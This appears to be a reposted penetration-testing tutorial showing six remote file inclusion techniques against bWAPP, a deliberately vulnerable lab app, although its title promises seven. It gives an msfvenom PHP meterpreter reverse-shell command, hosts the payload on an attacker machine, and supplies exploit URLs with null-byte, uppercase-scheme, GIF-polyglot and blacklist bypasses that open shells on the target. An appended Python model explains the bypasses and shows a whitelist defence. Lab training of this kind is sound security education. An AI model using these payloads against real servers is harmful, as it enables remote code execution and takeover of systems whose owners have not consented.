Channel: CodeSection, Code Area, Network Security - CodeSec

7 ways to Exploit RFI Vulnerability


In this article you will learn how to compromise a web application server that suffers from a remote file inclusion (RFI) vulnerability. I have performed the RFI attack using seven different techniques against bWAPP, a deliberately buggy web application built for practising exactly this kind of bug.

Remote File Inclusion (also known as RFI) is the process of including remote files by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path to the file that has to be included and this input is not properly sanitized, allowing an external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

For more details visit OWASP.org. Note that in PHP a remote include only works when allow_url_include is enabled (it is Off by default since PHP 5.2), which is why RFI is mostly found on legacy or deliberately misconfigured hosts such as the bWAPP VM used here.

Let’s Begin!!!

Basic RFI Attack

Open the target IP in the browser, log in to bWAPP as bee:bug, choose the bug "Remote & Local File Inclusion (RFI/LFI)" from the list and click Hack.



The requested page, which suffers from both RFI and LFI, opens. It asks you to select a language from a drop-down list; when you click Go, the name of the selected language file is passed in the URL as the language parameter and the server includes that file.



Now generate a malicious PHP file with msfvenom and start a handler in the background (use exploit/multi/handler in msfconsole with the same payload, LHOST and LPORT):

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f raw

Copy the generated PHP code into a text file.



I saved the copied PHP code as shell.php inside /var/www/html on the attacking machine (192.168.1.11), so that the target can fetch and include it. One caveat: the attacker's web server must serve this file as plain text. If PHP is enabled on that server, a request for shell.php executes the payload locally instead of returning its source, so either disable the PHP module there or serve the directory with a server that does not interpret PHP.



To perform the basic attack, change the language parameter so that it points at the PHP file on the attacking machine:

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go

becomes

http://192.168.1.113/bWAPP/rlfi.php?language=http://192.168.1.11/shell.php



As soon as you open the URL, the target fetches shell.php, executes it, and you get a reverse connection as a meterpreter session.

Meterpreter> sysinfo


Forced Extension RFI Attack

Repeat the same process but append a '?' (question mark) to the end of the URL. This covers the case where the application forces an extension by concatenating something like .php onto the parameter before including it: with the trailing '?', the appended suffix becomes part of the query string sent to the attacker's server, so the path that is actually fetched is still /shell.php. Remember that the multi/handler must still be running in the background.

http://192.168.1.113/bWAPP/rlfi.php?language=http://192.168.1.11/shell.php?



Again, when you open the URL it gives you another meterpreter session.

Meterpreter> sysinfo


Null Byte RFI Attack

For the null byte attack you need to intercept the request between the browser and the web server. Start Burp Suite, turn Intercept on and point the browser's proxy at it; the GET request to rlfi.php is then captured.



In the intercepted request, append %00 (a URL-encoded null byte) to the end of the language value, i.e. language=http://192.168.1.11/shell.php%00. The server decodes the parameter, and older PHP (before 5.3.4) truncates the path at the null byte, so anything the application appends after the parameter, such as a forced .php extension, is discarded. PHP 5.3.4 and later reject paths containing null bytes, so this technique only works against legacy installs. Make sure the multi/handler is running, then click Forward.



As soon as the GET request is forwarded you get the victim's reverse connection as a meterpreter session.

Meterpreter> sysinfo


Change http to HTTP

The fourth technique is the same as the first with one very small change: the scheme is written as HTTP instead of http. PHP's stream wrappers are looked up case-insensitively, so HTTP:// fetches the file exactly as http:// does, but a case-sensitive blacklist that only rejects the string "http://" lets the uppercase form through. That is why this variant can still succeed at a higher security level where the lowercase version fails.

http://192.168.1.113/bWAPP/rlfi.php?language=HTTP://192.168.1.11/shell.php



After making the change, open the URL with the multi/handler still running; it gives you another meterpreter session.

Meterpreter> sysinfo


Change Image Extension

In the next attack the file included remotely looks like an image but is actually our malicious PHP file. Open shell.php, add the GIF magic header GIF89a as its first line (the bytes a naive image check looks for), and save it as shell.gif in the same location, /var/www/html. The PHP interpreter ignores the leading bytes and still executes the <?php block, so a check based on the extension or on magic bytes does not stop the include.



Here again, make a small change to the URL to include the malicious image:

http://192.168.1.113/bWAPP/rlfi.php?language=http://192.168.1.11/shell.gif



When you open the URL, another meterpreter session opens.

Meterpreter> sysinfo


Black List RFI Attack

If you have read the file upload article you will be familiar with blacklists: a case-sensitive deny-list on the extension can be bypassed by changing some letters to upper case, for example .PHP or .PHP3.

You can apply this technique when the security level is high: rename shell.php to shell.PHP in the same location and request shell.PHP through the URL.

http://192.168.1.113/bWAPP/rlfi.php?language=http://192.168.1.11/shell.PHP



You again get another meterpreter session.

Meterpreter> sysinfo
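To make clear why each of the variants above works, here is an added example (my own Python, not code from the original article and not bWAPP's source). It models the server-side string handling that the tricks abuse: resolve_include() mirrors PHP's behaviour (URL decoding of $_GET, the application appending a forced suffix, case-insensitive stream-wrapper lookup, and null byte truncation in PHP before 5.3.4), while scheme_blacklist(), extension_blacklist() and image_only() are hypothetical stand-ins for the weak filters that the HTTP://, .PHP and .gif tricks bypass. The attacker host, the TARGET_LANGS whitelist and the POLYGLOT bytes are constructed for the example.

```python
# Added example, not code from the original article or from bWAPP: a model of
# the server-side handling each RFI trick relies on. Filter functions are
# hypothetical; resolve_include() mirrors documented PHP include() behaviour.
from urllib.parse import unquote, urlsplit

ATTACKER = "192.168.1.11"                  # attacker host from the article
TARGET_LANGS = {"lang_en.php", "lang_fr.php", "lang_nl.php"}   # assumed whitelist
# Constructed polyglot: GIF magic header followed by a PHP block (payload body elided).
POLYGLOT = b"GIF89a\n<?php /* payload body from msfvenom goes here */ ?>"


def resolve_include(language, forced_suffix="", legacy_php=False):
    """Return what include() would open for a given language parameter.

    ('remote', host, path) for a URL wrapper, ('local', name) for a plain
    filename, or None when modern PHP refuses the path (NUL byte present).
    """
    target = unquote(language) + forced_suffix      # PHP decodes $_GET, app appends suffix
    if "\x00" in target:
        if not legacy_php:
            return None                              # PHP >= 5.3.4 rejects NUL in paths
        target = target.split("\x00", 1)[0]          # PHP < 5.3.4 truncates at the NUL
    parts = urlsplit(target)
    scheme = parts.scheme.lower()                    # wrappers are case-insensitive: HTTP:// == http://
    if scheme in ("http", "https"):
        # The query string is sent to the attacker's server but never changes which
        # file is served, which is why a trailing '?' neutralises a forced suffix.
        return ("remote", parts.netloc, parts.path)
    return ("local", target)


def scheme_blacklist(language):
    """Weak check: case-sensitive deny-list on the scheme. True means accepted."""
    return not any(s in language for s in ("http://", "https://", "ftp://"))


def extension_blacklist(language):
    """Weak check: case-sensitive deny-list on the extension. True means accepted."""
    return not language.endswith((".php", ".php3", ".phtml"))


def image_only(language, content):
    """Weak check: image extension plus GIF magic bytes. True means accepted."""
    return language.lower().endswith((".gif", ".jpg", ".png")) and content[:6] in (b"GIF89a", b"GIF87a")


def php_executes(content):
    """include() runs any <?php block in the fetched bytes, whatever precedes it."""
    return b"<?php" in content


def whitelist(language):
    """Hardened check: exact match against known files, no user-controlled path at all."""
    return language in TARGET_LANGS


def demo():
    """Walk through the article's variants; returns {technique: bypass succeeded}."""
    base = f"http://{ATTACKER}/shell.php"
    results = {
        "basic": resolve_include(base) == ("remote", ATTACKER, "/shell.php"),
        # forced .php suffix alone breaks the include, a trailing '?' repairs it
        "forced_suffix_plain": resolve_include(base, ".php")[2] == "/shell.php",
        "forced_suffix_qmark": resolve_include(base + "?", ".php")[2] == "/shell.php",
        "null_byte_legacy": resolve_include(base + "%00", ".php", legacy_php=True)[2] == "/shell.php",
        "null_byte_modern": resolve_include(base + "%00", ".php") is not None,
        "uppercase_scheme": scheme_blacklist(f"HTTP://{ATTACKER}/shell.php")
        and resolve_include(f"HTTP://{ATTACKER}/shell.php")[0] == "remote",
        "gif_polyglot": image_only(f"http://{ATTACKER}/shell.gif", POLYGLOT) and php_executes(POLYGLOT),
        "uppercase_ext": extension_blacklist(f"http://{ATTACKER}/shell.PHP"),
    }
    # A strict whitelist rejects every one of the above payloads.
    results["whitelist_holds"] = not any(
        whitelist(p) for p in (base, base + "?", base + "%00",
                               f"HTTP://{ATTACKER}/shell.php",
                               f"http://{ATTACKER}/shell.gif",
                               f"http://{ATTACKER}/shell.PHP")
    )
    return results


if __name__ == "__main__":
    for technique, ok in demo().items():
        print(f"{technique:22s} {'bypass works' if ok else 'blocked'}")
```

Running the block prints which variants get through each weak check; the takeaway for defenders is the last line of demo(): none of the tricks matter once the parameter is matched against a fixed list of filenames instead of being filtered.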

